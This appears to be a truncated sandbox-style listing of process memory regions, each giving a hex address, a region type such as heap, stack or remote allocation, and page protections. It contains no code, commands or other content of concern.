heap
page read and write
7FFF29539000
unkown
page readonly
4826000
heap
page read and write
2B00000
unkown
page readonly
7B63000
heap
page read and write
2BC0000
unkown
page readonly
4918000
heap
page read and write
7FF514A4A000
unkown
page readonly
43D0000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
2B2F000
heap
page read and write
2B13000
heap
page read and write
670000
unkown
page readonly
B3EF000
stack
page read and write
7DBC000
heap
page read and write
1FD33799000
heap
page read and write
7B5B000
heap
page read and write
193F2A13000
heap
page read and write
181CD440000
trusted library allocation
page read and write
1FD337B6000
heap
page read and write
7FF5146A0000
unkown
page readonly
670000
unkown
page readonly
2760000
unkown
page read and write
16ABB72A000
heap
page read and write
825E000
unkown
page read and write
7DF446141000
trusted library allocation
page execute read
7A98000
heap
page read and write
7FF5144D4000
unkown
page readonly
44C8000
heap
page read and write
23A82D00000
heap
page read and write
7FF514660000
unkown
page readonly
116ED000
stack
page read and write
10B9A000
heap
page read and write
23A9CF00000
trusted library allocation
page read and write
F901000
heap
page read and write
223E9952000
heap
page read and write
6DE7000
stack
page read and write
CDB5000
unkown
page readonly
7FFF2E327000
unkown
page readonly
1F1A0AF2000
heap
page read and write
56B000
heap
page read and write
788E000
stack
page read and write
778000
heap
page read and write
7FF514B00000
unkown
page readonly
7D5B000
heap
page read and write
4850000
heap
page read and write
97C0000
heap
page read and write
E734000
unkown
page read and write
680000
unkown
page readonly
22E1B466000
heap
page read and write
F511000
heap
page read and write
7D64000
heap
page read and write
7FF5144EC000
unkown
page readonly
5367000
unkown
page read and write
7C34000
heap
page read and write
7FFF29451000
unkown
page execute read
27B6000
heap
page read and write
7FFEBFD40000
trusted library allocation
page read and write
7DFC000
heap
page read and write
5A6000
heap
page read and write
250000
unkown
page read and write
427A000
stack
page read and write
9F11000
unkown
page readonly
786B000
stack
page read and write
C3CB000
stack
page read and write
6B25000
heap
page read and write
7FF514B00000
unkown
page readonly
9516477000
stack
page read and write
B1E8000
stack
page read and write
8216000
unkown
page read and write
968C000
unkown
page read and write
449C000
stack
page read and write
7DD1000
heap
page read and write
4830000
heap
page read and write
7B4B000
heap
page read and write
7A98000
heap
page read and write
FBB1000
heap
page read and write
927000
heap
page read and write
27CC000
heap
page read and write
CEAC000
unkown
page readonly
7C31000
heap
page read and write
468A000
stack
page read and write
1FD1B000000
trusted library allocation
page read and write
F7B0000
heap
page read and write
7FBD000
unkown
page read and write
88AB47E000
stack
page read and write
7B52000
heap
page read and write
7B81000
heap
page read and write
4720000
unkown
page read and write
16AD4020000
trusted library allocation
page read and write
181CCB20000
heap
page read and write
7FFF295F0000
unkown
page read and write
23A9D1B0000
heap
page read and write
F380000
heap
page read and write
7FF514745000
unkown
page readonly
1DF7AFA1000
heap
page read and write
534B000
unkown
page read and write
F8FF000
heap
page read and write
7CFE000
heap
page read and write
A8EE000
stack
page read and write
6AD5000
heap
page read and write
2760000
unkown
page read and write
EBF54FF000
stack
page read and write
E9E4000
unkown
page read and write
A1EC000
unkown
page readonly
1FD1C187000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
181CD4D0000
trusted library allocation
page read and write
1C80BD62000
heap
page read and write
7DF446130000
trusted library allocation
page readonly
9786000
heap
page read and write
F8D2000
heap
page read and write
181CD3E0000
trusted library allocation
page read and write
218C8279000
heap
page read and write
1E9DDC02000
heap
page read and write
7FFEBFAA3000
trusted library allocation
page read and write
7DF446110000
trusted library allocation
page readonly
3468000
heap
page read and write
97B2000
heap
page read and write
6B7C000
heap
page read and write
C34F000
stack
page read and write
558000
heap
page read and write
7515000
unkown
page readonly
6AE0000
heap
page read and write
4A42000
system
page read and write
294F000
stack
page read and write
4D30000
unkown
page readonly
900D000
unkown
page read and write
4436000
heap
page read and write
4393000
unkown
page read and write
1FD33638000
heap
page read and write
AB35C3C000
stack
page read and write
20A3F928000
heap
page read and write
C8A5000
unkown
page readonly
400000
remote allocation
page execute and read and write
7D99000
heap
page read and write
925000
heap
page read and write
7C79000
heap
page read and write
1DF7B130000
trusted library allocation
page read and write
1DF7B120000
trusted library allocation
page read and write
7D49000
heap
page read and write
7FF514837000
unkown
page readonly
7DF446130000
trusted library allocation
page readonly
A5EE000
stack
page read and write
AB35BBF000
stack
page read and write
7FF5146F1000
unkown
page readonly
2740000
unkown
page read and write
27EA000
system
page read and write
7FF5147D5000
unkown
page readonly
2909000
stack
page read and write
1DF7B360000
trusted library allocation
page read and write
7FFEBFCD0000
trusted library allocation
page read and write
769C000
unkown
page read and write
DF52D7B000
stack
page read and write
95EF000
stack
page read and write
1FD1C4A4000
trusted library allocation
page read and write
5820000
unkown
page readonly
7B16000
heap
page read and write
23A9CDA0000
heap
page execute and read and write
181CD4C0000
trusted library allocation
page read and write
4C8E000
stack
page read and write
710A000
stack
page read and write
16AB9B10000
unkown
page readonly
7B81000
heap
page read and write
6B5E000
heap
page read and write
1F19BB59000
heap
page read and write
44CE000
heap
page read and write
48D6000
heap
page read and write
7FFEBFBA0000
trusted library allocation
page execute and read and write
75F0000
unkown
page readonly
A8C000
stack
page read and write
201E000
stack
page read and write
7FF514C0E000
unkown
page readonly
3ED0000
unkown
page read and write
7FF51491D000
unkown
page readonly
7DD8000
heap
page read and write
3450000
heap
page read and write
223E988A000
heap
page read and write
181CCE38000
heap
page read and write
7FFEBFDE0000
trusted library allocation
page read and write
480000
heap
page read and write
427A000
stack
page read and write
3FDA000
stack
page read and write
715D000
unkown
page readonly
7FF5144F5000
unkown
page readonly
7FFEBFCF0000
trusted library allocation
page read and write
1E9DD777000
heap
page read and write
431F000
unkown
page read and write
F625000
heap
page read and write
5E376DC000
stack
page read and write
2AFF000
stack
page read and write
4705000
stack
page read and write
6AF2000
heap
page read and write
7FF514666000
unkown
page readonly
4229000
heap
page read and write
1FD19490000
heap
page read and write
72A1000
unkown
page readonly
181CCE38000
heap
page read and write
F8D7000
heap
page read and write
62E0000
trusted library allocation
page read and write
7FF514969000
unkown
page readonly
16AD4020000
trusted library allocation
page read and write
283E000
heap
page read and write
6AF2000
heap
page read and write
25E9000
stack
page read and write
1F1A0880000
trusted library allocation
page read and write
4194000
heap
page read and write
F8E7000
heap
page read and write
7FF514A7A000
unkown
page readonly
7FFEBFD30000
trusted library allocation
page read and write
1F19C063000
trusted library allocation
page read and write
181B48C0000
trusted library allocation
page read and write
7FF51443D000
unkown
page readonly
973000
heap
page read and write
70A3000
trusted library allocation
page read and write
3FF0000
unkown
page readonly
44C0000
heap
page read and write
431F000
unkown
page read and write
6149000
unkown
page read and write
3EE3000
unkown
page read and write
1E9DD794000
heap
page read and write
4260000
trusted library section
page read and write
D8C67BB000
stack
page read and write
44DC000
heap
page read and write
6AA8000
heap
page read and write
7DF0000
heap
page read and write
B20000
trusted library allocation
page read and write
8443BFA000
stack
page read and write
B74000
heap
page read and write
218C80B0000
heap
page read and write
778000
heap
page read and write
7FFEBFD40000
trusted library allocation
page read and write
9841000
heap
page read and write
7D72000
heap
page read and write
7CA3000
heap
page read and write
2300000
unkown
page readonly
7DBC000
heap
page read and write
1E0000
heap
page read and write
4DA0000
unkown
page read and write
7FF51491A000
unkown
page readonly
7DE8000
heap
page read and write
2881000
unkown
page read and write
181CCFB1000
trusted library allocation
page read and write
1FD19583000
heap
page read and write
7DE8000
heap
page read and write
27A5000
heap
page read and write
FC5A000
heap
page read and write
7E3A000
heap
page read and write
277A000
unkown
page read and write
2213000
heap
page read and write
370000
heap
page read and write
1D78567C000
heap
page read and write
7FFF295E5000
unkown
page read and write
3304000
heap
page read and write
7FFF2E210000
unkown
page readonly
532C000
unkown
page read and write
FC54000
heap
page read and write
CE83000
unkown
page readonly
223E98C8000
heap
page read and write
6E1B000
unkown
page readonly
5161000
unkown
page read and write
F8D2000
heap
page read and write
52D000
heap
page read and write
757C000
unkown
page readonly
223E7BFA000
heap
page read and write
7FFEBFD00000
trusted library allocation
page read and write
7FFF295EA000
unkown
page read and write
2AF0000
unkown
page read and write
7CF7000
heap
page read and write
7B4B000
heap
page read and write
4290000
unkown
page read and write
7E5F000
heap
page read and write
6A63000
trusted library allocation
page read and write
2760000
unkown
page read and write
6150000
unkown
page read and write
7B4F000
heap
page read and write
117E5000
stack
page read and write
1FD1CC10000
trusted library allocation
page read and write
43E0000
heap
page read and write
6B14000
heap
page read and write
1FD33638000
heap
page read and write
109F3000
heap
page read and write
7DF2000
heap
page read and write
78CD000
unkown
page read and write
68B7B3C000
stack
page read and write
1F1A0AA8000
heap
page read and write
7FF514C8D000
unkown
page readonly
5D9000
heap
page read and write
44C2000
heap
page read and write
7E16000
heap
page read and write
7FF514AAA000
unkown
page readonly
D34F97E000
stack
page read and write
7FFF2E210000
unkown
page readonly
1F9E000
stack
page read and write
7605000
unkown
page readonly
2836000
unkown
page read and write
1DF79037000
heap
page read and write
76A9000
unkown
page read and write
16AB9BE6000
heap
page read and write
7C34000
heap
page read and write
30000
unkown
page read and write
6B03000
heap
page read and write
7B63000
heap
page read and write
1D24C7D000
stack
page read and write
D70000
unkown
page readonly
181B4F43000
trusted library allocation
page read and write
7FF5148AB000
unkown
page readonly
66A5000
trusted library allocation
page read and write
A215000
unkown
page readonly
72FF000
unkown
page readonly
7FFF2E2BD000
unkown
page write copy
441C000
heap
page read and write
7B81000
heap
page read and write
7DD8000
heap
page read and write
7C19000
heap
page read and write
1D25039000
stack
page read and write
7C0D000
heap
page read and write
7FFEBFC22000
trusted library allocation
page read and write
8216000
unkown
page read and write
10804000
heap
page read and write
700E000
stack
page read and write
455C000
stack
page read and write
5780000
trusted library section
page readonly
265A000
stack
page read and write
6A00000
trusted library allocation
page read and write
7B52000
heap
page read and write
7FF514BBF000
unkown
page readonly
5320000
unkown
page read and write
10B1E000
heap
page read and write
A11E000
unkown
page readonly
109DE000
heap
page read and write
B368000
stack
page read and write
6CC0000
trusted library allocation
page read and write
1D24D7E000
stack
page read and write
2776000
unkown
page read and write
4449000
heap
page read and write
3ED0000
trusted library section
page read and write
69B0000
trusted library allocation
page read and write
7C0D000
heap
page read and write
1FD196F5000
heap
page read and write
7D2A000
heap
page read and write
7B81000
heap
page read and write
7FFEBFC41000
trusted library allocation
page read and write
7FF51443D000
unkown
page readonly
1E9DD796000
heap
page read and write
97B2000
heap
page read and write
1088C000
heap
page read and write
481C000
heap
page read and write
4830000
heap
page read and write
7DD9000
heap
page read and write
E74A000
unkown
page read and write
22E1B40D000
unkown
page read and write
7B78000
heap
page read and write
7FF514B7A000
unkown
page readonly
A4BB000
stack
page read and write
7F91000
unkown
page read and write
EA63000
unkown
page read and write
62E0000
trusted library allocation
page read and write
F8EB000
heap
page read and write
181B4DB6000
trusted library allocation
page read and write
A7EC000
stack
page read and write
109FB000
heap
page read and write
4850000
heap
page read and write
7E5F000
heap
page read and write
1DF7AF1F000
heap
page read and write
7FF514C09000
unkown
page readonly
6690000
trusted library allocation
page read and write
66A0000
trusted library allocation
page read and write
23A9CC78000
heap
page read and write
7FF5146B0000
unkown
page readonly
7FF514444000
unkown
page readonly
6740000
trusted library allocation
page read and write
7B91000
heap
page read and write
449C000
stack
page read and write
7F70000
unkown
page read and write
7FF514C22000
unkown
page readonly
75DC000
unkown
page readonly
7E52000
heap
page read and write
7715000
unkown
page read and write
FB3F000
heap
page read and write
7D78000
heap
page read and write
728C000
stack
page read and write
7FF514999000
unkown
page readonly
7DEA000
heap
page read and write
4D30000
unkown
page readonly
7FFF2E31F000
unkown
page readonly
7C69000
stack
page read and write
1FD33781000
heap
page read and write
3304000
heap
page read and write
7B44000
heap
page read and write
F658000
heap
page read and write
214A000
stack
page read and write
CB7E000
unkown
page readonly
2776000
unkown
page read and write
7FF514BB6000
unkown
page readonly
270B000
stack
page read and write
C122000
unkown
page readonly
1DF00001000
trusted library allocation
page read and write
16ACBC50000
trusted library allocation
page read and write
7FF514660000
unkown
page readonly
7D78000
heap
page read and write
4710000
unkown
page read and write
FBCE000
heap
page read and write
2960000
heap
page read and write
2310000
unkown
page read and write
2860000
trusted library allocation
page read and write
10B95000
heap
page read and write
902000
heap
page read and write
2C68000
stack
page read and write
B1EA000
stack
page read and write
2778000
system
page execute and read and write
7FF514788000
unkown
page readonly
7E3C000
heap
page read and write
7FF514B28000
unkown
page readonly
7D1E000
stack
page read and write
25E9000
stack
page read and write
1F19BB00000
heap
page read and write
7FF514BE7000
unkown
page readonly
7FFF2E3AE000
unkown
page read and write
7FFEBFB46000
trusted library allocation
page read and write
543A000
system
page read and write
7E7D000
heap
page read and write
A4BB000
stack
page read and write
7B0E000
heap
page read and write
7B0000
remote allocation
page read and write
7FF514B31000
unkown
page readonly
1FD33AB0000
heap
page read and write
6D13000
trusted library allocation
page read and write
2879000
heap
page read and write
1DF78FEF000
heap
page read and write
7DE2000
heap
page read and write
7FF514A64000
unkown
page readonly
700000
unkown
page read and write
CE1C000
unkown
page readonly
6B5E000
heap
page read and write
1E9DD721000
heap
page read and write
4130000
unkown
page read and write
7CE6000
heap
page read and write
209E000
stack
page read and write
7DF446131000
trusted library allocation
page execute read
527000
heap
page read and write
294F000
stack
page read and write
7FFEBFD40000
trusted library allocation
page read and write
7DCA000
heap
page read and write
6E1E000
unkown
page readonly
77EA000
stack
page read and write
7FFEBFD00000
trusted library allocation
page read and write
CB97000
unkown
page readonly
7E5F000
heap
page read and write
7E45000
heap
page read and write
2990000
unkown
page readonly
7D03000
heap
page read and write
7FFF2960A000
unkown
page readonly
10942000
heap
page read and write
6A90000
heap
page read and write
7090000
trusted library allocation
page read and write
9770000
heap
page read and write
D38C000
stack
page read and write
209E000
stack
page read and write
A260000
unkown
page readonly
41BF000
heap
page read and write
CE83000
unkown
page readonly
7FFF295EE000
unkown
page read and write
68B878F000
stack
page read and write
223E9906000
heap
page read and write
9AA3000
unkown
page readonly
465C000
stack
page read and write
E734000
unkown
page read and write
77A6000
unkown
page read and write
7C27000
heap
page read and write
931000
heap
page read and write
7B0000
remote allocation
page read and write
7D30000
heap
page read and write
C6D3000
unkown
page readonly
1E9DDC02000
heap
page read and write
E691000
unkown
page read and write
7B6A000
heap
page read and write
7E6E000
stack
page read and write
71A0000
trusted library allocation
page read and write
FAFE000
heap
page read and write
7F6B000
stack
page read and write
3EF0000
unkown
page read and write
7FF514C09000
unkown
page readonly
6993000
trusted library allocation
page read and write
7FF514915000
unkown
page readonly
1F19B0AD000
heap
page read and write
6AC9000
heap
page read and write
7C1B000
heap
page read and write
7DF446151000
trusted library allocation
page execute read
250000
unkown
page read and write
7B5B000
heap
page read and write
7DC6000
heap
page read and write
6153000
unkown
page read and write
BF68000
stack
page read and write
1FD1AF60000
trusted library allocation
page read and write
7BDB000
heap
page read and write
22E1B500000
trusted library allocation
page read and write
F86F000
heap
page read and write
1DF0148A000
trusted library allocation
page read and write
7FF514AE2000
unkown
page readonly
6150000
unkown
page read and write
46B0000
unkown
page readonly
7B91000
heap
page read and write
117E5000
stack
page read and write
223E7C1A000
heap
page read and write
30E6EFE000
stack
page read and write
D70000
unkown
page readonly
7D77000
heap
page read and write
109FD000
heap
page read and write
690C000
stack
page read and write
5D9000
heap
page read and write
16AB9BA9000
heap
page read and write
7C1B000
heap
page read and write
F6EA000
heap
page read and write
7FF514999000
unkown
page readonly
7FFEBFAAC000
trusted library allocation
page read and write
76A7000
unkown
page read and write
AB354FE000
stack
page read and write
16AB9C22000
heap
page read and write
16AB9B40000
heap
page read and write
7FF5148CA000
unkown
page readonly
201E000
stack
page read and write
435D000
unkown
page read and write
16ABB580000
heap
page readonly
2D60000
heap
page read and write
223E98A4000
heap
page read and write
7FF514A13000
unkown
page readonly
27E2000
heap
page read and write
1F1A08D0000
remote allocation
page read and write
1FD1AF11000
trusted library allocation
page read and write
16AB9BD8000
heap
page read and write
181CD3F0000
trusted library allocation
page read and write
7FFF2E3A5000
unkown
page read and write
6A00000
trusted library allocation
page read and write
7C19000
heap
page read and write
43FD000
system
page execute and read and write
93ED000
stack
page read and write
52E0000
unkown
page read and write
181CCDFC000
heap
page read and write
F7EE000
heap
page read and write
7FF5144DC000
unkown
page readonly
7C6C000
heap
page read and write
42EE000
unkown
page read and write
2A49000
stack
page read and write
F90D000
heap
page read and write
7FF5148EF000
unkown
page readonly
7FF5144DC000
unkown
page readonly
4705000
stack
page read and write
2350000
unkown
page read and write
3EF3000
unkown
page read and write
F8DF000
heap
page read and write
8183000
unkown
page read and write
25B0000
heap
page read and write
4BA8000
stack
page read and write
E0F6000
unkown
page read and write
7F6B000
stack
page read and write
3280000
trusted library allocation
page read and write
7E2C000
heap
page read and write
1FD1AF50000
trusted library allocation
page read and write
1DF7AF14000
heap
page read and write
7FF51440E000
unkown
page readonly
966F000
stack
page read and write
2F16000
unclassified section
page execute and read and write
4E07000
stack
page read and write
7B91000
heap
page read and write
4798000
heap
page read and write
7B55000
heap
page read and write
4918000
heap
page read and write
23A94A01000
trusted library allocation
page read and write
7F78000
unkown
page read and write
7A0F000
stack
page read and write
A20000
heap
page read and write
7B4F000
heap
page read and write
156BEC07000
heap
page read and write
20A3F870000
heap
page read and write
1F9E000
stack
page read and write
1F1A0794000
trusted library allocation
page read and write
4121000
unkown
page read and write
1E9DD76D000
heap
page read and write
7FFF295EA000
unkown
page read and write
C83E000
unkown
page readonly
23A84A53000
trusted library allocation
page read and write
80EE000
unkown
page read and write
7FFEBFD30000
trusted library allocation
page read and write
7FF514BA9000
unkown
page readonly
51B0000
unkown
page read and write
156BEC00000
heap
page read and write
260A000
stack
page read and write
1DF7B160000
heap
page read and write
946C000
stack
page read and write
B1EA000
stack
page read and write
3FF0000
unkown
page readonly
6B34000
heap
page read and write
156BEE05000
heap
page read and write
42EE000
unkown
page read and write
7D2A000
heap
page read and write
75F9000
unkown
page readonly
AAEB000
stack
page read and write
820B000
stack
page read and write
DAF0000
unkown
page read and write
9782000
heap
page read and write
C922000
unkown
page readonly
AB35B3E000
stack
page read and write
7FF5147D5000
unkown
page readonly
7FFEBFB50000
trusted library allocation
page execute and read and write
156BEBF0000
heap
page read and write
7E1F000
heap
page read and write
6D20000
heap
page read and write
7D62000
heap
page read and write
1D24EBE000
stack
page read and write
7FFEBFD40000
trusted library allocation
page read and write
FBAB000
heap
page read and write
7B0D000
heap
page read and write
24204A50000
heap
page read and write
223E98CD000
heap
page read and write
1FD1B080000
heap
page read and write
1FD1AF80000
heap
page read and write
7D30000
heap
page read and write
41A0000
heap
page read and write
7DF0000
heap
page read and write
1FD1CABB000
trusted library allocation
page read and write
7FF514444000
unkown
page readonly
9A60000
unkown
page readonly
1DF7B360000
trusted library allocation
page read and write
763B8FE000
stack
page read and write
F774000
heap
page read and write
10945000
heap
page read and write
5F8000
heap
page read and write
7FFF2E2BD000
unkown
page write copy
488F000
heap
page read and write
7DF4000
heap
page read and write
807B000
unkown
page read and write
3ED3000
unkown
page read and write
3304000
heap
page read and write
7619000
unkown
page readonly
181CCFC0000
trusted library allocation
page read and write
4680000
unkown
page readonly
223E7C25000
heap
page read and write
181CCB49000
heap
page read and write
F8D9000
heap
page read and write
7DC6000
heap
page read and write
16ABC851000
trusted library allocation
page read and write
28CC000
stack
page read and write
F8F3000
heap
page read and write
7B1B000
heap
page read and write
41C3000
heap
page read and write
7FF514A70000
unkown
page readonly
2400000
heap
page read and write
7B57000
heap
page read and write
C90C000
unkown
page readonly
7FF5146A7000
unkown
page readonly
7008000
stack
page read and write
7C17000
heap
page read and write
973000
heap
page read and write
1DF0154E000
trusted library allocation
page read and write
8F0C000
unkown
page read and write
278B000
heap
page read and write
7D64000
heap
page read and write
10C04000
heap
page read and write
3E0000
unkown
page readonly
7CE8000
heap
page read and write
7DDB000
heap
page read and write
B96F000
stack
page read and write
7DEC000
heap
page read and write
96C1000
unkown
page read and write
5F3000
heap
page read and write
D17A000
unkown
page read and write
7B1B000
heap
page read and write
7FF51481C000
unkown
page readonly
25E9000
stack
page read and write
27CC000
heap
page read and write
D8C6EFF000
stack
page read and write
4897000
unkown
page read and write
BAEF000
stack
page read and write
48A9000
unkown
page read and write
7392000
unkown
page readonly
7CEF000
heap
page read and write
710000
unkown
page read and write
7D67000
heap
page read and write
7DEA000
heap
page read and write
DF1A000
heap
page read and write
23A84B0A000
trusted library allocation
page read and write
64AD000
stack
page read and write
7FF51465D000
unkown
page readonly
7FFEBFA84000
trusted library allocation
page read and write
7FFF295F3000
unkown
page readonly
48F6000
heap
page read and write
7FF514BBF000
unkown
page readonly
A5EE000
stack
page read and write
1FD2B580000
trusted library allocation
page read and write
7E28000
heap
page read and write
48D6000
heap
page read and write
7E6E000
stack
page read and write
7FF514999000
unkown
page readonly
710000
unkown
page read and write
527AFE000
stack
page read and write
23A9CC0D000
heap
page read and write
7200000
trusted library allocation
page read and write
181CD3E0000
trusted library allocation
page read and write
7B1D000
heap
page read and write
2D70000
heap
page read and write
7B16000
heap
page read and write
7E0E000
heap
page read and write
223E7C05000
heap
page read and write
7DF415AB1000
unkown
page execute read
44B9000
heap
page read and write
1D785540000
heap
page read and write
181CCFA0000
trusted library allocation
page read and write
7DE8000
heap
page read and write
F8DD000
heap
page read and write
27DC000
heap
page read and write
7FF514AC1000
unkown
page readonly
1FD1CA2A000
trusted library allocation
page read and write
424A000
stack
page read and write
F659000
heap
page read and write
F7C3000
heap
page read and write
F8CE000
heap
page read and write
4120000
heap
page read and write
109F1000
heap
page read and write
7B0E000
heap
page read and write
107CF000
heap
page read and write
223E98AD000
heap
page read and write
7090000
trusted library allocation
page read and write
7FFEBFCC5000
trusted library allocation
page read and write
C9EB000
stack
page read and write
4271000
heap
page read and write
7FFEBFA80000
trusted library allocation
page read and write
4199000
heap
page read and write
7FF5149D4000
unkown
page readonly
7BDB000
heap
page read and write
240000
heap
page read and write
3304000
heap
page read and write
97C4000
heap
page read and write
156BEBE3000
heap
page read and write
2050000
stack
page readonly
985C000
unkown
page read and write
6B78000
heap
page read and write
57C0000
unkown
page read and write
181CCC60000
trusted library allocation
page read and write
218C80A0000
heap
page read and write
C7FD000
unkown
page read and write
FB74000
heap
page read and write
7FF514C95000
unkown
page readonly
F886000
heap
page read and write
488F000
heap
page read and write
16ABD30F000
trusted library allocation
page read and write
2400000
heap
page read and write
97C0000
heap
page read and write
1F19C070000
trusted library allocation
page read and write
7FFEBFB76000
trusted library allocation
page execute and read and write
1E9DCE00000
heap
page read and write
2350000
unkown
page read and write
2D5000
stack
page read and write
F7C4000
heap
page read and write
A43E000
stack
page read and write
7B60000
heap
page read and write
4740000
unkown
page readonly
9A8B000
unkown
page readonly
10AF8000
heap
page read and write
7FFF295EE000
unkown
page read and write
48A9000
heap
page read and write
1D786510000
trusted library allocation
page read and write
223E98D4000
heap
page read and write
520000
heap
page read and write
2772000
heap
page read and write
7DF446101000
trusted library allocation
page execute read
7FF51466E000
unkown
page readonly
F8EF000
heap
page read and write
718000
heap
page read and write
7F6B000
stack
page read and write
75A5000
unkown
page readonly
2778000
system
page execute and read and write
7FF5148FF000
unkown
page readonly
7FFEBFB66000
trusted library allocation
page execute and read and write
7E41000
heap
page read and write
7FFF2E3A5000
unkown
page read and write
7FF514668000
unkown
page readonly
770000
heap
page read and write
1166D000
stack
page read and write
7DD9000
heap
page read and write
7DD9000
heap
page read and write
81A3000
unkown
page read and write
E744000
unkown
page read and write
7B81000
heap
page read and write
F625000
heap
page read and write
763BCB8000
stack
page read and write
1E9DD786000
heap
page read and write
2A49000
stack
page read and write
757C000
unkown
page readonly
8F8F000
unkown
page read and write
908C000
unkown
page read and write
7FF5149EF000
unkown
page readonly
7D30000
heap
page read and write
24204C4D000
heap
page read and write
418F000
heap
page read and write
7E34000
heap
page read and write
796C000
stack
page read and write
1FD1AF27000
heap
page execute and read and write
22E1B44A000
heap
page read and write
7FF514CAE000
unkown
page readonly
16AB9BDE000
heap
page read and write
7E51000
heap
page read and write
20A41B4F000
heap
page read and write
F7C4000
heap
page read and write
16AB9B10000
unkown
page readonly
181B2C14000
heap
page read and write
7FFEBFC42000
trusted library allocation
page read and write
78ED000
stack
page read and write
7F8B000
unkown
page read and write
7FFF2E3CA000
unkown
page readonly
D2BA000
heap
page read and write
98DE000
unkown
page read and write
AB3593E000
stack
page read and write
7FF5146E9000
unkown
page readonly
473F000
heap
page read and write
1F1A0AE1000
heap
page read and write
22E1B421000
unkown
page read and write
7FFEBFCD0000
trusted library allocation
page read and write
C919000
unkown
page readonly
7E4A000
heap
page read and write
43C0000
trusted library allocation
page read and write
7FFF29657000
unkown
page readonly
A25000
heap
page read and write
FAF5000
heap
page read and write
97E5000
heap
page read and write
1F19B075000
heap
page read and write
7FFEBFDA0000
trusted library allocation
page read and write
1DF7A8A0000
trusted library allocation
page read and write
488F000
heap
page read and write
1D785780000
trusted library allocation
page read and write
F7C5000
heap
page read and write
218C89B0000
trusted library allocation
page read and write
3CF0000
trusted library allocation
page execute and read and write
1DF7B120000
trusted library allocation
page read and write
7BDB000
heap
page read and write
97A8000
heap
page read and write
3EE0000
unkown
page read and write
7490000
heap
page read and write
7AD2000
heap
page read and write
2320000
unkown
page readonly
7DFA000
heap
page read and write
7DE2000
heap
page read and write
4720000
unkown
page read and write
7DCA000
heap
page read and write
79F0000
heap
page read and write
223E7B89000
heap
page read and write
7FF51486B000
unkown
page readonly
1FD337B1000
heap
page read and write
472A000
heap
page read and write
B9EB000
stack
page read and write
745C000
unkown
page readonly
181CCFE0000
trusted library allocation
page read and write
7B99000
heap
page read and write
1DF7B360000
trusted library allocation
page read and write
7B63000
heap
page read and write
6A9A000
heap
page read and write
7D6A000
heap
page read and write
7FF514C9C000
unkown
page readonly
836A000
stack
page read and write
C028000
stack
page read and write
1E9DCEF7000
heap
page read and write
7FFF2E3AC000
unkown
page read and write
7D62000
heap
page read and write
4280000
trusted library section
page read and write
4740000
unkown
page readonly
951657D000
stack
page read and write
7E0A000
heap
page read and write
CE6E000
unkown
page readonly
16ABD103000
trusted library allocation
page read and write
7F8D000
unkown
page read and write
7D1A000
heap
page read and write
181B57D7000
trusted library allocation
page read and write
7E3A000
heap
page read and write
7FF514909000
unkown
page readonly
7C7C000
heap
page read and write
7FFEBFC80000
trusted library allocation
page read and write
7FFEBFD50000
trusted library allocation
page read and write
B26A000
stack
page read and write
1F1A0AF8000
heap
page read and write
72FF000
unkown
page readonly
7B1B000
heap
page read and write
EAA6000
unkown
page read and write
7FFEBFC50000
trusted library allocation
page execute and read and write
7BD3000
heap
page read and write
223E7D20000
heap
page read and write
7B5B000
heap
page read and write
F8E9000
heap
page read and write
9F6F000
unkown
page readonly
2B8C000
stack
page read and write
4944000
unkown
page read and write
536C000
unkown
page read and write
A8EE000
stack
page read and write
27A8000
unkown
page read and write
7FF51487E000
unkown
page readonly
7FFEBFB30000
trusted library allocation
page read and write
181B2CCC000
heap
page read and write
7B63000
heap
page read and write
7CEA000
heap
page read and write
181CCDA0000
heap
page read and write
16ABC970000
trusted library allocation
page read and write
2E40000
trusted library allocation
page execute and read and write
9368000
stack
page read and write
181C4A74000
trusted library allocation
page read and write
7C69000
stack
page read and write
88AB87F000
stack
page read and write
23A84EB6000
trusted library allocation
page read and write
7DD4000
heap
page read and write
22E1B702000
heap
page read and write
7FFEBFD80000
trusted library allocation
page read and write
84A000
heap
page read and write
7CDA000
heap
page read and write
2D60000
heap
page read and write
70E0000
trusted library allocation
page read and write
7DC8000
heap
page read and write
8246000
unkown
page read and write
7FF514BD4000
unkown
page readonly
E744000
unkown
page read and write
7E40000
heap
page read and write
2B2F000
heap
page read and write
2834000
unkown
page read and write
342000
unkown
page read and write
788E000
stack
page read and write
7FF514706000
unkown
page readonly
6AD5000
heap
page read and write
7FFEBFB86000
trusted library allocation
page execute and read and write
7FF514745000
unkown
page readonly
2790000
heap
page read and write
434A000
stack
page read and write
CE90000
unkown
page readonly
2881000
unkown
page read and write
770000
heap
page read and write
4798000
heap
page read and write
2B20000
unkown
page read and write
8188000
stack
page read and write
7FF5147A0000
unkown
page readonly
7E0C000
heap
page read and write
8770000
stack
page read and write
1F19B102000
heap
page read and write
ED7D000
unkown
page read and write
97EC000
heap
page read and write
223E9A7E000
heap
page read and write
7FF514645000
unkown
page readonly
7FFF295F3000
unkown
page readonly
821A000
unkown
page read and write
F886000
heap
page read and write
DF12000
heap
page read and write
7FF514BC2000
unkown
page readonly
4206000
heap
page read and write
FAE5000
heap
page read and write
27D2000
unkown
page read and write
F6FB000
heap
page read and write
2AE0000
heap
page read and write
1E9DD796000
heap
page read and write
3304000
heap
page read and write
223E7C27000
heap
page read and write
A27C000
unkown
page readonly
181CCBAD000
heap
page read and write
EAE2000
unkown
page read and write
7FFEBFA93000
trusted library allocation
page execute and read and write
F87A000
heap
page read and write
20A4189F000
heap
page read and write
7FFEBFAA0000
trusted library allocation
page read and write
C815000
unkown
page readonly
7E16000
heap
page read and write
A86B000
stack
page read and write
7D30000
heap
page read and write
7FFEBFAA3000
trusted library allocation
page read and write
C8DC000
unkown
page readonly
41FA000
stack
page read and write
543A000
system
page read and write
7FF514980000
unkown
page readonly
840000
heap
page read and write
1DF7AE21000
trusted library allocation
page read and write
3EC0000
trusted library section
page read and write
20F8C24C000
heap
page read and write
223E9884000
heap
page read and write
7FF514A7A000
unkown
page readonly
2B13000
heap
page read and write
AB1D1FE000
stack
page read and write
DB30000
unkown
page read and write
7FFF295E5000
unkown
page read and write
1DF78F80000
heap
page read and write
CAC7000
unkown
page readonly
2AE0000
unkown
page read and write
DB2E000
unkown
page read and write
7FFEBFD60000
trusted library allocation
page read and write
181CD480000
trusted library allocation
page read and write
7DCA000
heap
page read and write
7FFF29657000
unkown
page readonly
7C34000
heap
page read and write
7FFEBFA93000
trusted library allocation
page read and write
181CD3B1000
trusted library allocation
page read and write
7FFEBFD90000
trusted library allocation
page read and write
223E9890000
heap
page read and write
2AE0000
unkown
page read and write
6CB5000
